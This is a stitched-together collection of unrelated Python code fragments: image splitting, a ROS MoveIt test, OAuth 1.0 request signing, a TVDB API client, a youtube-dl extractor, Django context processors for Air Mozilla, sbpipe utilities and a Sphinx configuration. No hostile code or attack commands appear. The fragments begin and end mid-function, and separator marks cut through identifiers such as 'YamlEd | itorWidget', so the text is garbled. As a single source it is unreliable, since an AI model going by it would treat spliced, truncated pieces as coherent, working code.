imagesOddJ[i] = Image.new(im.mode, ((width/2)/magicwidth, height/magicheight))
imagesOddJ[i].putdata(listsOddJ[i])
imagesOddJ[i].save("c:\\evil_odd_" + str(magicheight) + "_" + \
str(magicwidth) + "_" + str(i) + "_" + str(j) + ".jpg")
|
"""
Module with Qt widg | ets.
"""
from .debug_info import DebugPanelWidget
from .error_tab import ErrorWidget
from .info_panel import InfoPanelPage
from .tree import TreeWidget
from .yaml_editor import YamlEd | itorWidget
|
#!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE A | RE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIM | ITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Author: William Baker
#
# This test is used to ensure planning with a MoveGroupInterface is
# possbile if the robot's move_group node is in a different namespace
import unittest
import numpy as np
import rospy
import rostest
import os
from moveit_ros_planning_interface._moveit_move_group_interface import MoveGroupInterface
class PythonMoveGroupNsTest(unittest.TestCase):
PLANNING_GROUP = "manipulator"
PLANNING_NS = "test_ns/"
@classmethod
def setUpClass(self):
self.group = MoveGroupInterface(self.PLANNING_GROUP, "%srobot_description"%self.PLANNING_NS, self.PLANNING_NS)
@classmethod
def tearDown(self):
pass
def check_target_setting(self, expect, *args):
if len(args) == 0:
args = [expect]
self.group.set_joint_value_target(*args)
res = self.group.get_joint_value_target()
self.assertTrue(np.all(np.asarray(res) == np.asarray(expect)),
"Setting failed for %s, values: %s" % (type(args[0]), res))
def test_target_setting(self):
n = self.group.get_variable_count()
self.check_target_setting([0.1] * n)
self.check_target_setting((0.2,) * n)
self.check_target_setting(np.zeros(n))
self.check_target_setting([0.3] * n, {name: 0.3 for name in self.group.get_active_joints()})
self.check_target_setting([0.5] + [0.3]*(n-1), "joint_1", 0.5)
def plan(self, target):
self.group.set_joint_value_target(target)
return self.group.compute_plan()
def test_validation(self):
current = np.asarray(self.group.get_current_joint_values())
plan1 = self.plan(current + 0.2)
plan2 = self.plan(current + 0.2)
# first plan should execute
self.assertTrue(self.group.execute(plan1))
# second plan should be invalid now (due to modified start point) and rejected
self.assertFalse(self.group.execute(plan2))
# newly planned trajectory should execute again
plan3 = self.plan(current)
self.assertTrue(self.group.execute(plan3))
if __name__ == '__main__':
PKGNAME = 'moveit_ros_planning_interface'
NODENAME = 'moveit_test_python_move_group'
rospy.init_node(NODENAME)
rostest.rosrun(PKGNAME, NODENAME, PythonMoveGroupNsTest)
|
params)
normalized_uri = signature.normalize_base_string_uri(request.uri)
logging.debug("Normalized params: {0}".format(normalized_params))
logging.debug("Normalized URI: {0}".format(normalized_uri))
base_string = signature.construct_base_string(request.http_method,
normalized_uri, normalized_params)
logging.debug("Base signing string: {0}".format(base_string))
if self.signature_method == SIGNATURE_HMAC:
sig = signature.sign_hmac_sha1(base_string, self.client_secret,
self.resource_owner_secret)
elif self.signature_method == SIGNATURE_RSA:
sig = signature.sign_rsa_sha1(base_string, self.rsa_key)
else:
sig = signature.sign_plaintext(self.client_secret,
self.resource_owner_secret)
logging.debug("Signature: {0}".format(sig))
return sig
def get_oauth_params(self):
"""Get the basic OAuth parameters to be used in generating a signature.
"""
nonce = (generate_nonce()
if self.nonce is None else self.nonce)
timestamp = (generate_timestamp()
if self.timestamp is None else self.timestamp)
params = [
('oauth_nonce', nonce),
('oauth_timestamp', timestamp),
('oauth_version', '1.0'),
('oauth_signature_method', self.signature_method),
('oauth_consumer_key', self.client_key),
]
if self.resource_owner_key:
params.append(('oauth_token', self.resource_owner_key))
if self.callback_uri:
params.append(('oauth_callback', self.callback_uri))
if self.verifier:
params.append(('oauth_verifier', self.verifier))
return params
def _render(self, request, formencode=False, realm=None):
"""Render a signed request according to signature type
Returns a 3-tuple containing the request URI, headers, and body.
If the formencode argument is True and the body contains parameters, it
is escaped and returned as a valid formencoded string.
"""
# TODO what if there are body params on a header-type auth?
# TODO what if there are query params on a body-type auth?
uri, headers, body = request.uri, request.headers, request.body
# TODO: right now these prepare_* methods are very narrow in scope--they
# only affect their little thing. In some cases (for example, with
# header auth) it might be advantageous to allow these methods to touch
# other parts of the request, like the headers—so the prepare_headers
# method could also set the Content-Type header to x-www-form-urlencoded
# like the spec requires. This would be a fundamental change though, and
# I'm not sure how I feel about it.
if self.signature_type == SIGNATURE_TYPE_AUTH_HEADER:
headers = parameters.prepare_headers(request.oauth_params, request.headers, realm=realm)
elif self.signature_type == SIGNATURE_TYPE_BODY and request.decoded_body is not None:
body = parameters.prepare_form_encoded_body(request.oauth_params, request.decoded_body)
if formencode:
body = urlencode(body)
headers['Content-Type'] = 'application/x-www-form-urlencoded'
elif self.signature_type == SIGNATURE_TYPE_QUERY:
uri = parameters.prepare_request_uri_query(request.oauth_params, request.uri)
else:
raise ValueError('Unknown signature type specified.')
return uri, headers, body
def sign(self, uri, http_method='GET', body=None, headers=None, realm=None):
"""Sign a request
Signs an HTTP request with the specified parts.
Returns a 3-tuple of the signed request's URI, headers, and body.
Note that http_method is not returned as it is unaffected by the OAuth
signing process.
The body argument may be a dict, a list of 2-tuples, or a formencoded
string. The Content-Type header must be 'application/x-www-form-urlencoded'
if it is present.
If the body argument is not one of the above, it will be returned
verbatim as it is unaffected by the OAuth signing process. Attempting to
sign a request with non-formencoded data using the OAuth body signature
type is invalid and will raise an exception.
If the body does contain parameters, it will be returned as a properly-
formatted formencoded string.
All string data MUST be unicode. This includes strings inside body
dicts, for example.
"""
# normalize request data
request = Request(uri, http_method, body, headers,
encoding=self.encoding)
# sanity check
content_type = request.headers.get('Content-Type', None)
multipart = content_type and content_type.startswith('multipart/')
should_have_params = content_type == CONTENT_TYPE_FORM_URLENCODED
has_params = request.decoded_body is not None
# 3.4.1.3.1. Parameter Sources
# [Parameters are collected from the HTTP request entity-body, but only
# if [...]:
# * The entity-body is single-part.
if multipart and has_params:
raise ValueError("Headers indicate a multipart body but body contains parameters.")
# * The entity-body follows the encoding requirements of the
# "application/x-www-form-urlencoded" content-type as defined by
# [W3C.REC-html40-19980424].
elif should_have_params and not has_params:
raise ValueError("Headers indicate a formencoded body but body was not decodable.")
# * The HTTP request entity-header includes the "Content-Type"
# header field set to "application/x-www-form-urlencoded".
elif not should_have_params and has_params:
raise ValueError("Body contains parameters but Content-Type header was not set.")
# 3.5.2. Form-Encoded Body
# Protocol parameters can be transmitted in the HTTP request entity-
# body, but only if the following REQUIRED conditions are met:
# o The entity-body is single-part.
# o The entity-body follows the encoding requirements of the
# "application/x-www-form-urlencoded" content-type as defined by
# [W3C.REC-html40-19980424].
# o The HTTP request entity-header includes the "Content-Type" header
# field set to "application/x-www-form-urlencoded".
elif self.signature_type == SIGNATURE_TYPE_BODY and not (
should_have_params and has_params and not multipart):
raise ValueError('Body signatures may only be used with form-urlencoded content')
# generate the basic OAuth parameters
reques | t.oauth_params = self.get_oauth_params()
# generate the signature
request.oauth_params.append(('oauth_signature', self.get_oauth_signature(request)))
# render the signed request and return it
return self._render(request, formencode=True,
realm=(realm or self.realm))
class Server(object):
"""A server base class used to verify OAuth 1.0 RFC 5849 requests
|
OAuth providers should inherit from Server and implement the methods
and properties outlined below. Further details are provided in the
documentation for each method and property.
Methods used to check the format of input parameters. Common tests include
length, character set, membership, range or pattern. These tests are
referred to as `whitelisting or blacklisting`_. Whitelisting is better
but blacklisting can be usefull to spot malicious activity.
The following have methods a default implementation:
- check_client_key
- check_request_token
- check_access_token
- check_nonce
- check_verifier
- check_realm
The methods above default to whitelist input parameters, checking that they
are alphanumerical and between a minimum and maximum |
# -*- coding: utf-8 -*-
"""
This module implements the base class of tvdbsimple.
Handle automatically login, token creation and response basic stripping.
[See Authentication API section](https://api.thetvdb.com/swagger#!/Authentication)
"""
import json
import requests
class AuthenticationError(Exception):
"""
Authentication exception class for authentication errors
"""
pass
class APIKeyError(Exception):
"""
Missing API key exception class in case of missing api
"""
pass
class TVDB(object):
"""
Basic Authentication class for API key, login and token automatic handling functionality.
[See Authentication API section](https://api.thetvdb.com/swagger#!/Authentication)
"""
_headers = {'Content-Type': 'application/json',
'Accept': 'application/json',
'Connection': 'close'}
_BASE_PATH = ''
_URLS = {}
_BASE_URI = 'https://api.thetvdb.com'
def __init__(self, id=0, user=None, key=None):
"""
Initialize the base class.
You can provide `id` that is the item id used for url creation. You can also
provide `user`, that is the username for login.
You can also provide `key`, that is the userkey needed to
authenticate with the user, you can find it in the
[account info](http://thetvdb.com/?tab=userinfo) under account identifier.,
the language id you want to use to retrieve the info.
"""
self._ID = id
self.USER = user
"""Stores username if available"""
self.USER_KEY = key
"""Stores user-key if available"""
def _get_path(self, key):
return self._BASE_PATH + self._URLS[key]
def _get_id_path(self, key):
return self._get_path(key).format(id=self._ID)
def _get_complete_url(self, path):
return '{base_uri}/{path}'.format(base_uri=self._BASE_URI, path=path)
def _set_language(self, language):
if language:
self._headers['Accept-Language'] = language
def refresh_token(self):
"""
Refresh the current token set in the module.
Returns the new obtained valid token for the API.
"""
self._set_token_header()
response = requests.request(
'GET', self._get_complete_url('refresh_token'),
headers=self._headers)
response.raise_for_status()
jsn = response.json()
if 'token' in jsn:
from . import KEYS
KEYS.API_TOKEN = jsn['token']
return KEYS.API_TOKEN
return ''
def _set_token_header(self, forceNew=False):
self._headers['Authorization'] = 'Bearer ' + self.get_token(forceNew)
def get_token(self, forceNew=False):
"""
Get the existing token or creates it if it doesn't exist.
Returns the API token.
If `forceNew` is true the function will do a new login to retrieve the token.
"""
from . import KEYS
if not KEYS.API_TOKEN or forceNew:
if not KEYS.API_KEY:
raise APIKeyError
if hasattr(self,"USER") and hasattr(self,"USER_KEY"):
data = {"apikey": KEYS.API_KEY, "username": self.USER, "userkey": self.USER_KEY}
else:
data={"apikey": KEYS.API_KEY}
response = requests.request(
'POST', self._get_complete_url('login'),
data=json.dumps(data),
headers=self._headers)
if response.status_code == 200:
KEYS.API_TOKEN = response.json()['token']
else:
error = "Unknown error while authenticating. Check your api key or your user/userkey"
try:
error = response.json()['error']
except:
pass
raise AuthenticationError(error)
return KEYS.API_TOKEN
def _request(self, method, path, params=None, payload=None, forceNewToken=False, cleanJson = True):
self._set_token_header | (forceNewToken)
url = self._get_complete_url(path)
response = requests.request(
method, url, params=params,
data=json.dumps(payload) if payload else payload,
headers=self._headers)
if response.status_ | code == 200:
response.encoding = 'utf-8'
jsn = response.json()
if cleanJson and 'data' in jsn:
return jsn['data']
return jsn
elif not forceNewToken:
return self._request(method=method, path=path, params=params, payload=payload, forceNewToken=True)
try:
raise Exception(response.json()['error'])
except:
#response.raise_for_status()
pass
def _GET(self, path, params=None, cleanJson = True):
return self._request('GET', path, params=params, cleanJson=cleanJson)
def _POST(self, path, params=None, payload=None, cleanJson = True):
return self._request('POST', path, params=params, payload=payload, cleanJson=cleanJson)
def _DELETE(self, path, params=None, payload=None, cleanJson = True):
return self._request('DELETE', path, params=params, payload=payload, cleanJson=cleanJson)
def _PUT(self, path, params=None, payload=None, cleanJson = True):
return self._request('PUT', path, params=params, payload=payload, cleanJson=cleanJson)
def _set_attrs_to_values(self, response={}):
"""
Set attributes to dictionary values.
- e.g.
>>> import tvdbsimple as tvdb
>>> show = tmdb.Tv(10332)
>>> response = show.info()
>>> show.title # instead of response['title']
"""
if isinstance(response, dict):
for key in response:
setattr(self, key, response[key]) |
#The audio card number to be used; use "aplay -l" output to determine the card number
AUDIO_CARD_NUMBER = 1
# Define the IR/button input pin
INP_PIN = 2
# Speed with which the converted text is to be spoken
TTS_SPEED = 70
# Config server to spawned ot not, set to false if you do not want the config serve | r
CONFIG_SERVER_SPAWN = True
# Name of the file where the RSS link | s will be stored
RSS_LINKS_FILE = "links.txt"
# A temp file to indicate that the RSS list has been updated
NEW_LIST_FILE = ".changed.tmp"
|
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
parse_duration,
unified_strdate,
str_to_int,
float_or_none,
ISO639Utils,
)
class A | dobeTVIE(InfoExtractor):
_VALID_URL = r'https?://tv\.adobe\.com/watch/[^/]+/(?P<id>[^/]+)'
_TEST = {
'url': 'http://tv.adobe.com/watch/the-complete-picture-with-julieanne-kost/quick-tip-how-to-draw-a-circle-around-an-object-in-photoshop/',
'md5': '9bc5727bcdd55251f35ad311ca74fa1e',
'info_dict': | {
'id': 'quick-tip-how-to-draw-a-circle-around-an-object-in-photoshop',
'ext': 'mp4',
'title': 'Quick Tip - How to Draw a Circle Around an Object in Photoshop',
'description': 'md5:99ec318dc909d7ba2a1f2b038f7d2311',
'thumbnail': 're:https?://.*\.jpg$',
'upload_date': '20110914',
'duration': 60,
'view_count': int,
},
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
player = self._parse_json(
self._search_regex(r'html5player:\s*({.+?})\s*\n', webpage, 'player'),
video_id)
title = player.get('title') or self._search_regex(
r'data-title="([^"]+)"', webpage, 'title')
description = self._og_search_description(webpage)
thumbnail = self._og_search_thumbnail(webpage)
upload_date = unified_strdate(
self._html_search_meta('datepublished', webpage, 'upload date'))
duration = parse_duration(
self._html_search_meta('duration', webpage, 'duration') or
self._search_regex(
r'Runtime:\s*(\d{2}:\d{2}:\d{2})',
webpage, 'duration', fatal=False))
view_count = str_to_int(self._search_regex(
r'<div class="views">\s*Views?:\s*([\d,.]+)\s*</div>',
webpage, 'view count'))
formats = [{
'url': source['src'],
'format_id': source.get('quality') or source['src'].split('-')[-1].split('.')[0] or None,
'tbr': source.get('bitrate'),
} for source in player['sources']]
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'upload_date': upload_date,
'duration': duration,
'view_count': view_count,
'formats': formats,
}
class AdobeTVVideoIE(InfoExtractor):
_VALID_URL = r'https?://video\.tv\.adobe\.com/v/(?P<id>\d+)'
_TEST = {
# From https://helpx.adobe.com/acrobat/how-to/new-experience-acrobat-dc.html?set=acrobat--get-started--essential-beginners
'url': 'https://video.tv.adobe.com/v/2456/',
'md5': '43662b577c018ad707a63766462b1e87',
'info_dict': {
'id': '2456',
'ext': 'mp4',
'title': 'New experience with Acrobat DC',
'description': 'New experience with Acrobat DC',
'duration': 248.667,
},
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
player_params = self._parse_json(self._search_regex(
r'var\s+bridge\s*=\s*([^;]+);', webpage, 'player parameters'),
video_id)
formats = [{
'url': source['src'],
'width': source.get('width'),
'height': source.get('height'),
'tbr': source.get('bitrate'),
} for source in player_params['sources']]
# For both metadata and downloaded files the duration varies among
# formats. I just pick the max one
duration = max(filter(None, [
float_or_none(source.get('duration'), scale=1000)
for source in player_params['sources']]))
subtitles = {}
for translation in player_params.get('translations', []):
lang_id = translation.get('language_w3c') or ISO639Utils.long2short(translation['language_medium'])
if lang_id not in subtitles:
subtitles[lang_id] = []
subtitles[lang_id].append({
'url': translation['vttPath'],
'ext': 'vtt',
})
return {
'id': video_id,
'formats': formats,
'title': player_params['title'],
'description': self._og_search_description(webpage),
'duration': duration,
'subtitles': subtitles,
}
|
items = [
('Home', reverse('main:home'), 'home', ''),
('About', '/about/', '/about', ''),
('Channels', reverse('main:channels'), 'channels', ''),
('Calendar', reverse('main:calendar'), 'calendar', ''),
]
if not request.user.is_staff:
items.append(
('Tag Cloud', reverse('main:tag_cloud'), 'tag_cloud', '')
)
items.append(
('Starred', reverse('starred:home'), 'starred', '')
)
unfinished_events = 0
if request.user.is_active:
unfinished_events = Event.objects.filter(
creator=request.user,
status=Event.STATUS_INITIATED,
upload__isnull=False,
).count()
if settings.USE_NEW_UPLOADER:
items.append(
('New/Upload', reverse('new:home'), 'new', ''),
)
else:
items.append(
('Requests', reverse('suggest:start'), 'suggest', ''),
)
if request.user.is_staff:
items.append(
('Management', reverse('manage:events'), '', ''),
)
if not settings.BROWSERID_DISABLED:
items.append(
('Sign out', '/browserid/logout/', '', 'browserid-logout'),
)
return {'items': items, 'unfinished_events': unfinished_events}
# The reason for making this a closure is because this stuff is not
# needed on every single template render. Only the main pages where
# there is a nav bar at all.
return {'nav_bar': get_nav_bar}
def dev(request):
return {
'DEV': settings.DEV,
'DEBUG': settings.DEBUG,
'BROWSERID_DISABLED': settings.BROWSERID_DISABLED,
}
def search_form(request):
return {'search_form': SearchForm(request.GET)}
def base(request):
def get_feed_data():
feed_privacy = _get_feed_privacy(request.user)
if getattr(request, 'channels', None):
channels = request.channels
else:
channels = Channel.objects.filter(
slug=settings.DEFAULT_CHANNEL_SLUG
)
if settings.DEFAULT_CHANNEL_SLUG in [x.slug for x in channels]:
title = 'Air Mozilla RSS'
url = reverse('main:feed', args=(feed_privacy,))
else:
_channel = channels[0]
title = 'Air Mozilla - %s - RSS' % _channel.name
url = reverse(
'main:channel_feed',
args=(_channel.slug, feed_privacy)
)
return {
'title': title,
'url': url,
}
return {
# used for things like {% if event.attr == Event.ATTR1 %}
'Event': Event,
'get_feed_data': get_feed_data,
}
def sidebar(request):
# none of this is relevant if you're in certain URLs
def get_sidebar():
data = {}
if not getattr(request, 'show_sidebar', True):
return data
# if viewing a specific page is limited by channel, apply that
# filtering here too
if getattr(request, 'channels', None):
channels = request.channels
else:
channels = Channel.objects.filter(
slug=settings.DEFAULT_CHANNEL_SLUG
)
if settings.DEFAULT_CHANNEL_SLUG in [x.slug for x in channels]:
sidebar_channel = settings.DEFAULT_CHANNEL_SLUG
else:
_channel = channels[0]
sidebar_channel = _channel.slug
data['upcoming'] = get_upcoming_events(channels, request.user)
data['featured'] = get_featured_events(channels, request.user)
data['sidebar_top'] = None
data['sidebar_bottom'] = None
sidebar_urls_q = (
Q(url='sidebar_top_%s' % sidebar_channel) |
Q(url='sidebar_bottom_%s' % sidebar_channel) |
Q(url='sidebar_top_*') |
Q(url='sidebar_bottom_*')
)
# to avoid having to do 2 queries, make a combined one
# set it up with an iterator
for page in StaticPage.objects.filter(sidebar_urls_q):
if page.url.startswith('sidebar_top_'):
data['sidebar_top'] = page
elif page.url.startswith('sidebar_bottom_'):
data['sidebar_bottom'] = page
return data
# Make this context processor return a closure so it's explicit
# from the template if you need its data.
return {'get_sidebar': get_sidebar}
def get_upcoming_events(channels, user,
length=settings.UPCOMING_SIDEBAR_COUNT):
"""return a queryset of upcoming events"""
anonymous = True
contributor = False
if user.is_active:
anonymous = False
if is_contributor(user):
contributor = True
cache_key = 'upcoming_events_%s_%s' % (int(anonymous), int(contributor))
cache_key += ','.join(str(x.id) for x in channels)
event = most_recent_event()
if event:
cache_key += str(event.modified.microsecond)
upcoming = cache.get(cache_key)
if upcoming is None:
upcoming = _get_upcoming_events(channels, anonymous, contributor)
upcoming = upcoming[:length]
cache.set(cache_key, upcoming, 60 * 60)
return upcoming
def _get_upcoming_events(channels, anonymous, contributor):
"""do the heavy lifting of getting the featured events"""
upcoming = Event.objects.upcoming().order_by('start_time')
upcoming = upcoming.filter(channels__in=channels).distinct()
upcoming = upcoming.select_related('picture')
if anonymous:
upcoming = upcoming.exclude(privacy=Event.PRIVACY_COMPANY)
elif contributor:
upcoming = upcoming.filter(privacy=Event.PRIVACY_PUBLIC)
return upcoming
def get_featured_events(
channels,
user,
length=settings.FEATURED_SIDEBAR_COUNT
):
"""return a list of events that are sorted by their score"""
anonymous = True
contributor = False
if user.is_active:
anonymous = False
if is_contributor(user): |
contributor = True
cache_key = 'featured_events_%s_%s' % (int(anonymous), int(contributor))
if channels:
cache_key += ','.join(str(x.id) for x in channels)
event = most_recent_event()
if event:
cache_key += str(event.modified.microsecond)
featured = cache.get(cache_key)
if featured is None:
featured = _get_featured_events(channels, anonymous, contributor)
featured = featured[:length]
cache | .set(cache_key, featured, 60 * 60)
# Sadly, in Django when you do a left outer join on a many-to-many
# table you get repeats and you can't fix that by adding a simple
# `distinct` on the first field.
# In django, if you do `myqueryset.distinct('id')` it requires
# that that's also something you order by.
# In pure Postgresql you can do this:
# SELECT
# DISTINCT main_eventhitstats.id as id,
# (some formula) AS score,
# ...
# FROM ...
# INNER JOIN ...
# INNER JOIN ...
# ORDER BY score DESC
# LIMIT 5;
#
# But you can't do that with Django.
# So we have to manually de-dupe. Hopefully we can alleviate this
# problem altogether when we start doing aggregates where you have
# many repeated EventHitStats *per* event and you need to look at
# their total score across multiple vidly shortcodes.
events = []
for each in featured:
if each.event not in events:
events.append(each.event)
return events
def _get_featured_events(channels, anonymous, contributor):
"""do the heavy lifting of getting the featured events"""
now = timezone.now()
yesterday = now - datetime.timedelta(days=1)
# subtract one second to not accidentally tip it
yesterday -= datetime.timedelta(seconds=1)
featured = (
EventHitStats.objects
.filter(
Q(event__status=Event.STATUS_SCHEDULED) |
Q(event__status=Event.STATUS_PROCESSING)
)
. |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 Piero Dalle Pezze
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distri | bute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT | WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import subprocess
import logging
logger = logging.getLogger('sbpipe')
def which(cmd_name):
"""
Utility equivalent to `which` in GNU/Linux OS.
:param cmd_name: a command name
:return: return the command name with absolute path if this exists, or None
"""
for path in os.environ["PATH"].split(os.pathsep):
if os.path.exists(os.path.join(path, cmd_name)):
return os.path.join(path, cmd_name)
if os.path.exists(os.path.join(path, cmd_name + '.exe')):
return os.path.join(path, cmd_name + '.exe')
return None
def is_py_package_installed(package):
"""
Utility checking whether a Python package is installed.
:param package: a Python package name
:return: True if it is installed, false otherwise.
"""
try:
installed_packages = subprocess.Popen(['pip', 'list'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()[0]
if package in str(installed_packages):
return True
return False
except OSError as e:
logger.warning("pip is not installed")
return False
def is_r_package_installed(package):
"""
Utility checking whether a R package is installed.
:param package: an R package name
:return: True if it is installed, false otherwise.
"""
try:
output = subprocess.Popen(['Rscript',
os.path.join(os.path.dirname(__file__), os.pardir, "is_package_installed.r"),
package],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()[0]
logger.debug("is sbpiper installed? " + str(output))
if "TRUE" in str(output):
return True
return False
except OSError as e:
logger.error("R is not installed")
return False
|
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import mozilla_sphinx_theme
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, '..')
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.mathjax',
'sphinx.ext.autosummary',
'sphinx.ext.napoleon'
]
napoleon_google_docstring = False
napoleon_numpy_docstring = True
autosummary_generate = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'bandicoot'
copyright = u'2014-2015, Yves-Alexandre de Montjoye, Luc Rocher, Alex Pentland'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.4'
# The full version, including alpha/beta/rc tags.
release = '0.4.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "mozilla"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [os.path.dirname(mozilla_sphinx_theme.__file__)]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If | true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Addition | al templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'bandicootdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'bandicoot.tex', u'bandicoot Documentation',
u'Yves-Alexandre de Montjoye, Luc Rocher, Alex Pentland', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'bandicoot', u'bandicoot Documentation',
[u'Yves-Alexandre de Montjoye, Luc Rocher, Alex Pentland'], 1)
]
# If true, show URL addresses after external links.
